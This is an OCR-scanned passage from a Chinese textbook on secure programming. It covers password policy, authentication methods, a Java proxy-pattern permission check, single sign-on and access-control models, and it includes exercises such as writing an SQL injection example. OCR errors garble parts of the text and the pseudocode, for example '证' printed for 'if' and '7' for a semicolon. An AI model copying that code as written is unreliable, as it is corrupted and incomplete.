(2) 建立 较 好 的 密码 策略 和 账户 锁定 策略 ,如 使 用 者 如 果 多 次 尝试 某 个 密码 ,可 以 


让 其 账户 锁定 ，; 


(3) 在 账号 和 密码 的 传输 中 ,使 用 HTTPS 方法 来 保护 认证 的 传输 ,这 样 可 以 较 大 


。 程度 上 避免 受到 窍 听 和 重 放 攻击 的 风险 ， 


(4) 进行 严格 的 输入 验证 。 这 是 一 个 常见 的 话题 ,可 以 有 效 防范 很 多 种 类 的 攻击 ， 
如 跨 站 脚本 、SQL 注入、 命令 执 行 等 。 

还 有 很 多 其 他 方法 和 策略 ,读者 可 以 根据 自己 网 站 的 实际 情况 采用 相应 的 措施 ,也 
可 以 参考 相关 资料 。 
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小 结 


本 章 主要 针对 Web 编程 中 的 一 些 安全 问题 进行 讲解 。 首 先 讲解 了 Web 运行 的 原 
理 , 然 后 讲解 了 URL 操作 攻击 , 接 下 来 针对 Web 程序 的 特性 ,讲解 了 4 种 页 面 之 间 传 
递 状态 的 技术 ,并 比较 了 它们 的 安全 性 ,最 后 针对 跨 站 脚本 .SQL 注入 和 Web 认证 攻 
击 进行 了 详细 叙述 。 


练 “ 习 


.编写 一 个 实际 的 例子 ,实现 SQL 注入 。 

.编写 一 段 代码 ,防范 SQL 注入 。 

.怎样 获取 服务 器 端 session? 

.Cookie 方法 的 安全 弱点 在 哪里 ?怎样 解决 ? 

. 怎样 防范 密码 猜测 ? 

.编写 代码 ,实现 URL 操作 攻击 的 防范 。 

. 通过 SQL 注入 可 以 实现 数据 库 表 的 删除 ,怎样 通过 授权 来 防范 ? 

. 存储 过 程 能 够 预防 SQL 注入 攻击 吗 ? 如 果 不 能 完全 预防 , 举 一 个 例子 。 
. 隐藏 表单 具有 不 安全 因素 ,可 以 被 其 他 技术 取代 吗 ? 

10. 编写 一 段 代码 ,过 滤 表 单 提交 中 的 所 有 特殊 字符 。 
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权限 控制 


软件 开发 中 ,对 用 户 权限 进行 控制 ,应 用 已 经 越 来 越 广泛 ,在 某 些 系统 中 ,科学 的 权 
限 控 制 方法 ,保证 了 资源 访问 的 安全 性 ,成 为 系统 安全 性 的 重要 保障 。 因 此 ,对 于 程序 
员 来 说 ,权限 控制 怎样 开发 ,显得 非常 重要 。 

本 章 首 先 对 权限 控制 进行 了 概述 ,阐述 了 权限 控制 的 基本 概念 和 基本 思想 ; 接 下 
来 阐述 了 常见 的 一 些 权 限 控制 方法 ,如 用 户 名 /口令 方法 、 智 能 卡 认证 方法 ,动态 口令 方 
法 等 等 。 并 对 这 些 方法 的 优 缺点 进行 了 阐述 。 

不 过 ,站 在 编码 的 角度 来 讲 , 这 些 方法 本 身 的 实现 并 不 重要 ,人 们 关心 的 是 怎样 在 
软件 开发 的 过 程 中 较 好 地 控制 权限 ,因此 ,后 面 的 篇 幅 讲解 了 一 些 有 代表 性 的 权限 控制 
开发 方法 ,如 基于 代理 模式 权限 控制 的 方法 、 基 于 AOP 的 权限 控制 方法 ,等 等 。 

本 章 还 介绍 了 较 流行 的 统一 权限 控制 方法 一 一 单 点 登录 。 

最 后 ,本 章 讲解 了 权限 控制 系统 的 一 些 常见 管理 策略 。 


9.1 权限 控制 概述 


9.1.1 权限 控制 分 类 


权限 是 一 个 广泛 的 概念 ,有 面向 资源 管理 人 员 的 ,有 面向 开发 人 员 的 。 本 章 所 叙述 
的 权限 ,主要 是 指 在 对 某 个 资源 进行 某 种 操作 时 ,对 操作 者 的 身份 要 进行 的 限制 。 在 一 
般 的 系统 中 ,操作 者 的 身份 是 以 用 户 的 形式 进行 表达 的 。 因 此 ,权限 控制 ,是 针对 各 种 
非法 操作 所 提出 的 一 种 安全 保护 措施 。 
在 软件 开发 的 过 程 中 .使 不 同 的 用 户 对 资源 具有 不 同 的 使 用 权限 ,是 非常 重要 的 一 
项 功能 ,特别 是 在 某 些 安全 性 要 求 比较 高 的 软件 中 ,为 软件 加 入 权限 控制 功能 ,可 以 说 
成 为 一 个 安全 性 能 的 重要 保障 。 如 数据 库 管 理 软 件 、 资 源 管理 软件 中 ,这 项 功能 更 为 
重要 。 

在 权限 的 概念 中 ,一 般 说 得 比较 多 的 有 以 下 几 个 概念 。 

。 用户 : 对 资源 的 操作 者 身份 。 
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。 功能 权限 : 用 户 能 否 执行 某 个 功能 。 比 如 此 用 户 是 否 能 进行 商品 查询 的 功能 。 
功能 权限 是 一 类 比较 基础 的 权限 ,赋予 的 值 ,不 是 Y(Yes) 就 是 NCNo) ,又 叫做 
Y/N 权限 。 
数据 权限 : 在 用 户 具有 了 某 一 功能 权限 的 基础 上 ,规定 用 户 可 以 访问 的 数据 范 
围 。 比 如 ,用 户 能 够 进行 商品 查询 ,也 就 是 说 有 了 查询 商品 的 功能 权限 ,但 是 他 ， 
可 能 只 能 查询 出 某 一 种 类 型 的 商品 ,或 者 只 能 查询 某 一 个 时 段 的 商品 ,这 些 都 | 
属于 数据 权限 。 | 
在 一 些 软件 中 ,对 于 权限 控制 ,还 引入 了 “角色 ”或 者 “用 户 组 ”等 概念 ,归根 结 底 , 其 
目的 是 为 了 将 以 上 3 个 概念 进行 更 好 、 更 方便 的 管理 ; 从 软件 开发 者 的 角度 讲 ,需要 通 
过 编程 来 控制 的 ,就 是 用 户 、 功 能 权限 .数据 权限 这 3 个 概念 。 


9.1.2 用 户 认 证 方法 


权限 控制 ,首要 的 是 对 用 户 进行 认证 , 即 确定 : 什么 样 的 用 户 是 合法 的 。 只 有 合法 
的 用 户 才 具 有 判断 其 权限 的 资格 ,才能 被 授予 访问 的 权限 。 用 户 认证 有 很 多 方法 ,按照 
认证 的 形式 分 ,主要 有 以 下 几 种 。 
1. 用 户 名 /口令 
用 户 名 /口令 ,是 最 简单 ,也 是 最 常用 的 用 户 认 证 方法 。 大 量 的 系统 中 都 是 采用 这 
种 方法 。 该 方法 有 以 下 特点 : 
。 用 户 名 可 以 由 每 个 用 户 自己 设 定 ,也 可 由 系统 给 出 ; | 
。 用 户 的 口令 (或 者 密码 ) 由 用 户 自己 设 定 ,理论 上 只 有 用 户 自 己 才 具有 读 取 和 修 
改 权 ; | 
。 对 于 某 一 用 户 名 ,只 要 能 够 正确 输入 口令 ,计算 机 就 认为 持 该 用 户 名 的 操作 者 
就 是 合法 用 户 。 
该 方法 最 常用 ,但 是 也 是 一 种 单 因素 的 认证 ,从 安全 性 上 讲 ,用户 名 /口令 方式 是 一 
种 不 安全 的 身份 认证 方式 。 其 不 安全 性 主要 体现 在 : 
。 安 全 性 依赖 于 口令 ,许多 用 户 为 了 防止 忘记 口令 ,经常 采用 很 简单 的 口令 (如 用 
自己 的 生日 ) 或 者 将 口令 简单 存放 (如 简单 地 保存 在 邮箱 或 者 自己 机 器 的 硬盘 ， 
上 ) ,造成 口令 容易 猜测 和 泄露 。 | 
。 口令 是 静态 的 数据 ,而 大 量 的 口令 验证 是 远程 的 ,在 验证 过 程 中 要 在 计算 机 内 
存 中 和 网 络 中 传输 ,容易 被 攻击 者 通过 各 种 手段 (如 木马 程序 或 网 络 监听 程序 ) 
截获 。 
。 口令 保 存在 数据 库 中 ,可 能 被 管理 员 得 知 ,等 等 。 
2. 智能 卡 认证 
智能 卡 是 一 种 内 置 集成 电路 的 芯片 ,由 专门 的 厂商 通过 专门 的 设备 生产 ,芯片 中 存 
有 与 用 户 身份 相关 的 数据 。 智 能 卡 有 如 下 特点 : | 
。 是 不 可 复制 的 硬件 ,由 合法 用 户 随身 携带 ; 
。 如果 用 户 想 要 进行 认证 ,必须 将 智能 卡 插 入 专用 的 读 卡 器 , 读 取 其 中 的 信息 ,再 
通过 一 定 的 手段 ,以 验证 用 户 的 身份。 | 
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不 过 ,和 前 面 一 种 方法 类 似 , 由 于 存在 于 智能 卡 中 的 数据 是 静态 的 ,在 验证 过 程 中 
也 可 能 要 在 计算 机 内 存 中 和 网 络 中 传输 ,攻击 者 也 可 以 通过 各 种 手段 (如 木马 程序 或 网 
络 监听 程序 ) 截 获 。 因 此 还 是 存在 一 定 的 安全 隐患 。 

3. 动态 口令 技术 

动态 口令 技术 采用 专门 硬件 ,每 次 根据 一 定 的 密码 算法 生成 不 同 的 密码 ,显示 出 来 
告诉 用 户 , 每 个 密码 只 能 使 用 一 次 。 用 户 使 用 时 ,将 显示 的 当前 密码 提交 给 服务 器 , 当 
密码 传输 到 服务 器 端 ,认证 服务 器 采用 相同 的 算法 计算 当前 的 有 效 密码 ,判断 两 个 密码 
是 否 吻合 , 即 可 实现 身份 认证 。 由 于 每 次 使 用 的 密码 动态 产生 ,用 户 每 次 使 用 的 密码 不 


相同 ,即使 黑客 通过 一 定 手段 截获 了 一 次 密码 ,也 无 法 利用 这 个 密码 来 仿冒 合法 用 户 的 


身份 。 

不 过 ,如 果 客 户 端 与 服务 器 端的 密码 不 能 保持 良好 的 同步 ,就 可 能 发 生 合法 用 户 无 
法 登录 的 问题 。 因 此 ,此 方法 对 技术 要 求 较 高 。 

此 外 ,还 有 基于 USB Key 的 身份 认证 ,生物 特征 认证 技术 ,等 等 。 

对 于 每 一 种 认证 方法 ,我 们 没有 办 法 去 避免 其 劣势 。 当 然 , 站 在 程序 员 的 角度 , 主 


要 关心 的 是 权限 控制 怎样 去 通过 编程 来 实现 。 


由 于 大 量 的 应 用 软件 都 是 基于 “用 户 名 /口令 ”的 方法 进行 验证 的 ,因此 ,本 章 后 面 
的 内 容 将 基于 这 种 验证 方法 进行 讲解 。 


9.2 权限 控制 的 开发 


”9.2.1 开发 思想 


软件 中 的 权限 控制 如 何 开发 ,运用 不 同 的 编程 方式 ,就 有 不 同 的 实现 策略 。 随 着 软 
件 的 结构 越 来 越 复杂 ,权限 控制 也 要 越 来 越 精细 。 从 编程 结构 上 讲 , 如 果 要 实现 细致 的 


。 权限 操作 ,就 必须 在 每 一 个 方法 中 检查 权限 ,最 常见 的 结构 为 : 


public businessMethod( ) 
{ 
// 权限 判断 
// 获得 用 户 信息 
证 (用 户 拥有 此 方法 的 权限 ) 
{ 
// 该 用 户 执行 相关 功能 


// 抛 出 异常 
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这 种 方法 ,实际 上 是 一 种 在 具体 功能 前 加 入 权限 操作 检验 的 实现 方式 ,能 够 将 权限 ， 
的 粒度 控制 到 具体 的 业务 方法 ,比较 有 效 ,控制 能 力也 比较 强大 。 但 是 ,该 方法 有 很 多 
缺点 : 

。 每 个 功能 类 都 需要 相应 的 权限 检验 代码 ; 

。 项 目 中 分 布 着 大 量 的 权限 控制 代码 ,程序 功能 和 权限 检验 混淆 在 一 起 ,存在 紧 ， 

密 的 耦合 性 ,扩展 修改 难度 大 。 

总 的 来 说 ,从 程序 员 的 角度 讲 , 除 了 安全 性 之 外 ,权限 控制 系统 的 开发 应 该 保证 以 
下 几 点 : 

。 权限 控制 模块 和 业务 逻辑 模块 分 开 , 可 以 单独 开发 ; 

。 可 以 很 方便 地 对 权限 控制 模块 进行 修改 ,具有 良好 的 可 维护 性 ,等 等 。 


9.2.2 基于 代理 模式 的 权限 控制 开发 


代理 模式 (Proxy Pattern) 是 一 种 常见 的 软件 设计 模式 , 它 的 经 典 定义 (GoF 给 出 
的 定义 ) 是 : 给 某 一 个 对 象 提供 一 个 代理 ,并 由 代理 对 象 控制 对 原 对 象 的 引用 。 其 意义 
和 日 常生 活 中 的 “代理 类似。 代理 模式 能 够 协调 调用 者 和 被 调用 者 ,能够 在 一 定 程 度 
上 降低 系统 的 耦合 度 。 

虽然 代理 模式 可 能 使 得 请 求 的 处 理 速度 会 变 慢 ,但 是 能 够 将 代理 模块 的 功能 从 整 
个 系统 中 分 离 出 来 。 

代理 模式 基本 结构 如 图 9-1 所 示 。 


覆 户 


图 9-1 


从 这 里 可 以 看 出 ,代理 模式 有 如 下 特点 : 

。 代理 类 和 工作 类 实现 同样 的 接口 ， 

* 客户 端 和 代理 类 打交道 ， 

。 代理 类 如 果 通 过 验证 , 则 将 请 求 发 给 工作 类 ; 

。 客户 和 代理 类 打交道 ,其 感觉 就 好 像 在 调用 工作 类 一 样 , 也 就 是 说 ,代理 类 实际 

上 对 客户 透明 。 

很 明显 ,代理 模式 的 以 上 特点 ,决定 了 权限 控制 可 以 借助 代理 模式 来 编写 。 代 理 模 | 
式 怎 样 实现 权限 控制 呢 ? 很 简单 ,将 权限 控制 的 代码 写 在 代理 类 内 就 可 以 了 。 | 

举 一 个 例子 , 某 个 论坛 上 有 多 个 功能 : 如 发 帖子 发 评论 (简便 起 见 , 只 列 出 这 两 个 | 
功能 ) ,客户 端 要 用 这 些 功能 ,必须 验证 一 定 的 权限 。 传 统 情况 下 ,必须 在 各 个 方法 中 编 
写 权限 控制 的 代码 ,这 样 的 话 , 权 限 控制 代码 和 实际 业务 代码 混合 在 一 起 ,不 好 维护 。 
此 时 就 可 以 将 权限 验证 的 模块 写成 代理 ,如 下 所 示 
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P09_01. java 


package prj09; 
// 接口 
interface Forum 
{ 
// 发 表 帖 子 
public void writeArticle(); 
// 发 表 评 论 
public void writeComment(); 
} 
// 代理 类 ,负责 检查 权限 
class ForumProxy implements Forum 
{ 
// 此 处 接口 可 传人 实际 工作 对 象 
private Forum forum; 
public ForumProxy(Forum forum) 
{ 
this. forum = forum; 
} 
Public void writeArticle() 
| 
// 检查 用 户 权限 
证 (该 用 户 拥有 发 表 帖子 权限 ) 
{ 
forum. writeArticle( ); 
} 
} 
Public void writeComment() 
{// 发 评论 
// 检查 用 户 权 限 
证 (该 用 户 拥有 发 表 评论 权限 ) 
{ 
forum. writeComment() 7 
} 
} 
} 
// 实际 工作 类 
class ForumOpe implements Forum 
{ 
public void writeArticle() 
{ 
// 做 发 表 帖子 的 工作 
} 
public void writeComment() 
{ 
// 做 发 表 评论 的 工作 
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从 上 面 的 代码 可 以 看 出 ,权限 控制 模块 完全 独立 出 来 了 ,并 且 和 实际 工作 模块 降低 
了 耦合 性 。 客 户 直 接 和 代理 类 打交道 ,方法 如 下 : 


Public class P09_01 
{ 


public static void main(String[ ] args) | 


Forum forum = new ForumProxy(new ForumOpe()); 
// 和 调用 代理 类 


forum. writeRrticle() 7 


} 


以 上 代码 是 伪 代码 ,无 法 直接 运行 ,但 是 ,读者 可 以 从 中 看 出 代理 模式 的 应 用 ,并 能 
够 预计 其 运行 结果 。 | 
从 以 上 的 例子 可 以 看 出 ,在 代理 模式 的 实现 过 程 中 ,每 个 功能 类 实现 一 个 相应 的 代 
理 类 ,在 代理 类 中 进行 权限 检查 。 | 
并 提示 “不 过 ,如 果 系统 足够 复杂 ,可 能 带 来 的 问题 是 代理 类 太 多 。 
很 明显 ,如 果 将 每 个 用 户 的 权限 由 Proxy 实现 转 为 容器 的 实现 ,可 以 大 大 简化 应 用 
程序 的 设计 ,关于 这 方面 的 内 容 , 大 家 可 以 参考 相应 文档 。 


9.2.3 基于 AOP 的 权限 控制 开发 


面向 方面 编程 (Aspect Oriented Programming, AOP), 是 目前 一 种 比较 流行 的 技 
术 。 这 种 技术 的 思想 是 : 通过 预 编译 方式 和 运行 期 动态 代理 ,给 程序 动态 统一 添加 功 
能 的 一 种 技术 ,但 是 不 需要 修改 程序 源 代码 。 

AOP 并 不 是 OOP( 面 向 对 象 编程 ) 的 蔡 代 品 ,是 OOP 的 延续 ,也 可 以 说 是 软件 设 
计 模 式 的 延续 。 

AOP 也 能 为 权限 控制 的 开发 提供 较 好 的 解决 方案 .有 兴趣 的 读者 可 以 进行 学 习 。 
将 这 一 部 分 作为 课外 作业 来 进行 。 


9.3 单 点 登录 


9.3.1 单 点 登录 概述 


单 点 登录 (Single Sign-On,SSO) 是 权限 控制 开发 中 的 一 个 创新 。 单 点 登录 是 一 种 
身份 认证 管理 方法 。 
单 点 登录 在 一 些 包含 子 系统 的 项 目 中 具有 广泛 的 应 用 。 例 如 ,在 一 个 成 为 有 机 整 
体 的 部 门 中 ,网 站 建设 的 过 程 ,往往 具有 如 下 特点 : 
。 由 于 历史 原因 ,一 个 网 站 中 往往 有 多 个 应 用 子 系统 ,如 办 公 自 动 化 系统 、 档 案 管 | 
理 系统 、 财 务 管理 系统 ,等 等 ,它们 不 是 一 次 性 开发 完毕 ,而 是 在 不 同 的 时 期 开 ， 
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发 完成 。 
。 各 应 用 系统 由 于 功能 侧重 、 设 计 方法 和 开发 技术 有 所 不 同 ,比如 语言 服务 器 环 
境 不 同等 ,各 自 的 用 户 保存 在 各 自 的 库 中 ,具有 自己 的 独立 的 用 户 认证 体系 ; 


会 内 用 户 在 每 个 应 用 系统 中 都 有 独立 的 账号 。 
。 。”。 随 着 子 系统 的 应 用 整合 ,网 站 的 用 户 可 能 要 使 用 多 个 子 系统 。 
在 这 种 情况 下 ,就 会 造成 一 些 问题 : 


。 由 于 用 户 在 每 个 应 用 系统 中 有 独立 的 账号 ,进入 每 一 个 应 用 系统 前 都 需要 以 该 
应 用 系统 的 账号 来 登录 ,同一 个 用 户 在 多 个 系统 中 要 记 多 个 用 户 名 密码 ,登录 


麻烦 ; 
。 应 用 系统 不 同 ,用 户 账 号 可 能 不 同 ,用 户 必 须 同时 牢记 多 套用 户 名 称 和 用 户 
密码 ; 


。 一 个 用 户 离职 或 者 改变 ,需要 维护 所 有 子 系统 中 他 的 账号 ,如 变更 5 个 人 员 ,一 
共 6 个 应 用 系统 ,需要 重复 维护 30 个 人 员 信息 ,维护 起 来 不 方便 ,等 等 。 
| 所 以 ,对 于 应 用 系统 和 用 户 数目 较 多 的 企业 ,需要 建立 一 个 统一 的 登录 平台 ,使 用 
”SSO 技术 可 以 解决 以 上 这 些 问 题 。 在 单 点 登录 系统 中 ,每 个 用 户 只 需 记 录 一 个 用 户 名 
和 密码 ,登录 一 个 平台 后 即 可 实现 各 应 用 系统 的 透明 跳 转 ,实行 统一 的 用 户 信息 管理 
系统 。 

| IBM 对 SSO 有 一 个 形象 的 解释 “ 单 点 登录 ,全 网 漫游 "。SSO 的 一 种 较为 通俗 的 
， 定义 是 : SSO 是 指 访问 同一 服务 器 不 同 应 用 中 的 同一 用 户 , 只 需要 登录 一 次 ,再 访问 其 
”他 应 用 中 的 受 保护 资源 时 ,不 再 需要 重新 登录 验证 。 


”9.3.2 单 点 登录 中 账号 管理 


| 单 点 登录 的 应 用 场合 很 多 ,不 过 ,一 般 情况 下 ,和 C/S 应 用 相 比 , 单 点 登录 在 B/S 
， 模式 下 用 得 比较 多 。 
| 实现 单 点 登录 的 第 一 步 , 就 是 子 系统 中 账号 的 统一 管理 。 

单 点 登录 的 目的 ,是 要 让 用 户 登录 一 次 ,能 够 访问 各 个 子 系统 ,那么 用 户 登 录用 的 
账号 和 密码 就 只 能 有 一 个 ,但 是 在 各 个 子 系统 中 都 有 自己 的 账号 密码 ,怎样 实现 统一 
呢 ? 方法 有 以 下 几 种 。 

1. 各 个 子 系统 账号 同步 

| 该 方法 中 ,对 于 同一 个 用 户 而 言 ,每 个 子 系统 账号 密码 相同 。 比 如 用 户 A 需要 使 
， 用 系统 与 了 系统 ,就 必须 在 X 系统 与 Y 系统 中 都 创建 用 户 名 ,并 且 用 户 名 密码 一 
| 致 ,这 样 ,用 户 A 可 以 用 这 个 用 户 名 ,保证 一 


a 个 名 字 能 够 登录 到 两 个 系统 ,如 图 9-2 所 示 。 
| | ] 但 是 ,这 种 方法 的 代价 是 XY 任 一 系统 
子 蚀 |] [5 | ] 中 用 户 A 的 信息 更 改 ,必须 同步 至 另 一 系统 ， 
1 1 否则 会 引起 数据 的 不 一 致 。 该 方法 用 户 信息 
用 户 名 jguokehual guokehual Euokehud 同步 会 增加 系统 的 复杂 性 ,增加 管理 的 成 本 。 
一 般 不 采用 。 


图 9-2 
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EE 
2. 统一 存储 


该 方法 中 ,各 个 子 系统 并 不 存储 相应 的 用 户 名 ,所 有 用 户 的 用 户 名 存储 一 份 , 单 独 
存放 ,如 图 9-3 所 示 。 

该 方法 不 会 遇 到 同步 问题 ,维护 方便 。 但 是 不 太 现实 ,因为 每 个 子 系统 可 能 本 来 就 
有 自己 的 账号 ,除非 将 所 有 的 账号 密码 进行 一 次 大 的 清理 ,否则 无 法 实现 统一 存储 ,但 
是 这 样 带 来 的 代价 又 比较 大 。 

3. 用 户 映 射 | 

该 方法 中 ,保留 原 有 系统 中 用 户 的 账号 ,将 其 和 新 的 账号 进行 一 个 映射 。 实 际 上 操 
作 的 过 程 中 ,用 户 首先 注册 一 个 单 点 登录 账号 ,然后 针对 每 个 应 用 系统 映射 一 个 该 应 用 
系统 中 原 有 的 账号 ,并 维护 这 些 注 册 和 绑 定 信息 。 

用 户 统一 使 用 新 的 账号 。 用 新 账号 登录 子 系统 ,在 底层 还 是 相当 于 用 原 有 的 账号 
进行 登录 ,如 图 9-4 所 示 。 


用 户 
了 | 1 | 
| 子 系统 1| 。 | 子 系统 2 
1 了 
子 系统 1 子 系统 2 柄 1 
一 一 guokehual guokehua2 guokehua3 
! t 1 喘 时 ss I 之 
用 户 名 guokehua guokehua 
图 9-3 图 9-4 


该 方法 既 不 破坏 原 有 用 户 存储 ,也 不 存在 同步 的 问题 ,是 一 种 可 行 性 比较 高 的 
方法 。 


9.3.3 单 点 登录 实现 


用 户 统一 管理 之 后 , 接 下 来 就 是 单 点 登录 的 实现 。 一 般 情 况 下 ,SSO 的 实现 机 制 
不 尽 相 同 ,大 体 分 为 session 机 制 和 Cookie 机 制 两 大 类 。 
1 session 机 制 
该 机 制 是 session 服务 器 端的 对 象 , 因 此 , session 机 制 是 一 种 服务 器 机 制 , 当 客户 
端 访问 服务 器 时 ,服务 器 为 客户 端 创建 一 个 唯一 的 sessionId, 来 保证 该 次 会 话 的 过 程 
中 服务 器 端 为 该 客户 分 配 的 是 同一 个 session。session 方法 的 过 程 如 下 : 
。 客户 端 访问 任意 一 个 子 系统 ,服务 器 端 检查 session 。 
。 如 果 session 中 显示 “未 登录 ”, 则 服务 器 将 页 面 跳 转 到 单 点 登录 页 面 。 
。 客户 在 单 点 登录 页 面 中 登录 ; 成 功 后 ,服务 器 端 将 session 置 为 “已 登录 ”状态 ， 
并 存储 相应 信息 。 
。 客户 访问 另 一 个 子 系统 ,服务 器 检查 session ,此 时 session 内 置 为 “已 登录 ” 状 | 
态 ; 服务 器 从 session 内 取出 相应 信息 到 数据 库 验 证 ,如 果 成 功 , 则 视 为 登录 成 ， 
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功 ,无须 客户 输入 密码 。 
由 于 session 的 机 制 ,用 session 方式 实现 SSO, 不 能 在 多 个 浏览 器 之 间 实 现 单 点 登 
录 , 但 只 要 sessionId 被 共享 ,SSO 就 可 以 跨 域 。 
一 些 商 用 服务 器 ,如 WebLogic, 通 过 Session 共享 认证 信息 。 
2. Cookie 机 制 
Cookie 是 服务 器 存储 在 客户 端的 一 个 文件 ,存储 了 的 内 容 主 要 包括 Cookie 名 、 


Cookie 值 、Cookie 过 期 时 间 、Cookie 所 在 的 域 等 。 商 用 软件 中 , WebSphere 通过 
Cookie 记录 认证 信息 ,目前 大 部 分 SSO 产品 采用 的 是 Cookie 机 制 , 在 Java 系列 中 , 目 
| 前 能 够 找到 的 较 好 的 开源 单 点 登录 产品 CAS 也 是 采用 Cookie 机 制 。 


并 提示 “Central Authentication Service (CAS) 单 点 登录 系统 最 早 由 耶鲁 大 学 开 
发 。CAS 具有 设计 理念 先进 、 体 系 结构 合理 ,配置 简单 ,客户 端 支 持 广 泛 、 技 术 成 熟 等 
优点 。 读 者 可 以 在 http://www. ja-sig. org/products/cas/ 去 下 载 或 参考 相应 文档 。 


Cookie 机 制 的 过 程 如 下 : 

客户 端 访问 任意 一 个 子 系统 ,服务 器 端 读 取 Cookie; 

如 果 Cookie 中 无 法 得 到 账号 密码 或 者 其 他 登录 信息 , 则 服务 器 将 页 面 跳 转 到 

单 点 登录 页 面 ; 

客户 在 单 点 登录 页 面 中 登录 ; 成 功 后 ,服务 器 端 将 登录 信息 保存 在 客户 端 

Cookie; 

客户 访问 另 一 个 子 系统 ,服务 器 读 取 Cookie, 此 时 服务 器 端 可 以 得 到 相应 的 登 

录 信 息 , 取 出 ,到 数据 库 验证 ,如 果 成 功 , 则 视 为 登录 成 功 ,无 须 客户 输 入 密码 。 
注意 ,由 于 Cookie 的 不 安全 性 (如 可 能 被 禁用 等 ) ,这 里 Cookie 可 能 要 进行 一 定 的 

加 密 。 另 外 ,Cookie 中 保存 了 关于 域 的 一 些 信息 ,因此 用 Cookie 方式 可 实现 SSO, 域 

名 必须 相同 。 


9.4 权限 控制 的 管理 


权限 控制 的 管理 ,主要 是 指 对 用 户 以 及 其 对 资源 的 访问 权限 进行 合理 的 配置 ,使 其 


。 达到 如 下 效果 ， 


。 可 以 很 方便 地 对 某 一 用 户 的 某 种 权限 进行 读 取 或 修改 ; 
。 也 可 以 很 方便 地 对 一 批 类 似 的 用 户 的 某 种 权限 进行 读 取 或 修改 。 


权限 控制 的 管理 ,有 以 下 几 种 模型 。 
资源 1 资源 2 | 一 二 矩阵 模型 
用 户 1| R RW 国 这 种 模型 出 现 于 早期 的 应 用 之 中 ,将 用 户 和 资 
用 户 2 | RW R 加 源 设 计 为 矩阵 ,矩阵 中 可 以 为 用 户 对 某 种 资源 的 权 
: : : 限 进行 赋值 ,如 图 9-5 所 示 。 


图 9-5 这 种 方法 中 ,授权 关系 明确 ,直截了当 , 存 取 都 
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很 容易 。 但 是 不 太 容易 适应 变化 ,也 不 方便 对 多 个 用 户 进行 统一 管理 。 

2. 任务 模型 

任务 ,是 指 业务 流程 中 的 一 个 逻辑 操作 ,一 个 流程 一 般 包 含 一 到 多 个 任务 。 该 模型 
是 一 种 动态 的 权限 控制 模型 ,用 户 在 执行 不 同 任务 中 被 许可 的 权限 可 能 不 一 样 ,可 以 应 
用 于 某 些 用 户 权限 随 着 任务 不 同 而 不 同 的 系统 ,使 用 范围 较 窗 。 但 是 适合 于 用 户 权限 | 
和 环境 紧密 关联 或 者 需要 动态 授权 的 应 用 系统 。 

3. 角色 模型 | 

该 模型 中 ,在 系统 中 设计 多 种 角色 ,将 用 户 和 资源 连接 起 来 。 用 户 所 对 应 的 角色 是 
否 能 够 对 某 个 资源 访问 ,决定 了 用 户 对 某 个 资源 是 否 能 够 访问 。 可 以 对 用 户 统一 管理 ， 
适应 变化 。 

但 是 ,用 户 通过 角色 访问 资源 ,对 于 某 些 具有 单一 类 型 权限 的 用 户 ,不 得 不 为 其 创 
建 角 色 , 角 色弱 化 为 用 户 ,显得 多 此 一 举 。 

4. 综合 模型 

该 模型 综合 了 矩阵 模型 和 角色 模型 的 优点 。 首 先 ,以 角色 为 桥梁 ,将 用 户 和 资源 连 
接 起 来 ,用 户 对 某 个 资源 是 否 能 够 访问 ,取决 于 该 用 户 所 对 应 的 角色 是 否 能 够 对 某 个 次 
源 访问 。 授 权 既 对 用 户 进行 ,也 对 角色 进行 。 当 然 ,角色 和 用 户 的 权限 进行 重 释 ,需要 
有 一 定 的 规则 进行 规定 。 授 权 比 较 方便 灵活 ,不 过 ,计算 复杂 ,运算 效率 低 。 

该 方法 得 到 了 广泛 的 应 用 ,如 SQL Server 等 软件 中 基本 上 是 基于 这 种 思想 进行 管 
理 ; 另外 一 些 系 统 中 提出 了 群 组 的 概念 ,以 群 组 为 基础 ,将 某 一 组 织 或 者 群体 下 的 用 户 
统一 授权 ,用 户 对 某 个 资源 是 否 能 够 访问 ,取决 于 该 用 户 所 对 应 的 群 组 是 否 能 够 对 某 个 
资源 访问 ,实际 上 也 是 使 用 了 这 种 模型 。 | 


小 结 


本 竟 对 权限 控制 进行 了 阐述 。 首 先 讲解 了 权限 控制 的 概念 ,然后 阐述 了 权限 控制 
的 一 些 方法 , 接 下 来 站 在 软件 开发 者 的 角度 ,讲解 了 一 些 常见 的 权限 控制 开发 方法 ,最 | 
后 讲解 了 权限 控制 系统 的 管理 。 | 


练 习 


1. 很 多 情况 下 ,用 户口 令 都 是 保存 在 数据 库 中 。 而 数据 库 管 理 员 具有 较 大 的 操作 
权限 。 如 何 保证 数据 库 中 的 密码 不 被 管理 员 窃 取 ? 

2. 权限 管理 在 数据 库 产品 中 表现 得 比较 严密 。 

(1) Oracle 中 的 权限 管理 是 基于 什么 方式 ? 

(2) MS SQL Server 中 的 权限 管理 是 基于 什么 方式 ? 
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3. 权限 管理 有 哪些 方法 ? 各 有 什么 优 缺点 ? 
4. 基于 AOP 的 权限 控制 系统 ,目前 受到 了 广泛 的 重视 。 查 找 相关 资料 ,了 解 关 于 
”AOP 实现 权限 控制 的 原理 。 
5. SSO 是 一 种 流行 的 统一 用 户 管理 方法 。 
| (1) 如 果子 应 用 用 不 同 的 语言 编写 ,如 一 个 是 JSP, 一 个 是 ASP, SSO 还 能 进行 单 
点 登录 的 配置 吗 ? 
| (2) 请 任 选 一 种 服务 器 ,完成 一 个 SSO 的 配置 。 
6. 有 一 个 员工 管理 系统 ,要 求 : 
管理 员 级 别 的 用 户 可 以 删除 系统 中 的 其 他 用 户 和 修改 其 密码 ; 
普通 用 户 能 浏览 自己 的 信息 ,也 可 以 修改 自己 的 信息 ; 
。 经 理 级 别 的 用 户 , 除 了 具有 普通 用 户 的 权限 之 外 ,还 可 以 浏览 该 部 门 的 用 户 。 
(1) 设计 其 用 户 管理 模型 。 
(2) 以 “浏览 客户 服务 部 门 的 用 户 ” 为 例 ,怎样 判断 当前 用 户 的 操作 权限 ? 
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远程 调用 和 组 件 , 给 程序 功能 的 扩充 提供 了 较 大 的 支持 。 本 章 主要 针对 目前 比较 
流行 的 远程 调用 方法 和 常见 的 组 件 进行 安全 讲解 。 

远程 调用 (RPC/RMI) 为 程序 的 分 布 式 应 用 开发 架构 提供 了 技术 支持 , 它 不 需要 了 
解 底层 网 络 通信 协议 ,在 应 用 层 通 过 网 络 从 远程 计算 机 程序 上 请 求 服务 。 本 章 首先 讲 
解 远程 调用 的 基本 原理 和 安全 问题 。 

